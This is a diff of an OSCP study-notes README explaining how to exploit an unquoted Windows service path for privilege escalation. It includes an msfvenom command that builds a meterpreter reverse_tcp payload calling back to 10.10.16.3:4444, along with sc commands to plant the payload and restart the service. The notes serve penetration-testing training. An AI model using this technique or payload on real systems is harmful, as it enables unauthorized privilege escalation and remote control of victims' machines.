AbdullahZuhair21/OSCP-Notes/README.md

 13- Unquoted Service Path
-this means the service path doesn't have quotes  so what will happen is the windows will run the following path as Program.exe -> Program Files.exe -> Unqouted.exe -> Unqouted Path.exe -> Unqouted Path Service.exe. run PowerUp.ps1 to check the unquoted path
+this means the service path doesn't have quotes  so what will happen is the windows will run the following path as Program.exe -> Program Files.exe -> Unqouted.exe -> Unqouted Path.exe -> Unqouted Path Service.exe. run PowerUp.ps1/winPEAS.exe to check the unquoted path C:\Program Files\Unquoted Path Service\Common Files\...
-C:\Program Files\Unquoted Path Service\Common Files\...
+-     sc query ServiceName #make sure that service is running
-so what if you can make a malicious executable file named Common.exe?
-Windows will run it create a common.exe file using msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.3 LPORT=4444 -f exe -o common.exe move the file to the common path and upload the file then start the service again
+-     sc stop ServiceName #stop the service create a common.exe file using msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.3 LPORT=4444 -f exe -o common.exe move the file to the common path and upload the file then start the service again
--     sc start unquotedsvc
+-     sc start ServiceName

 -----------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Platforms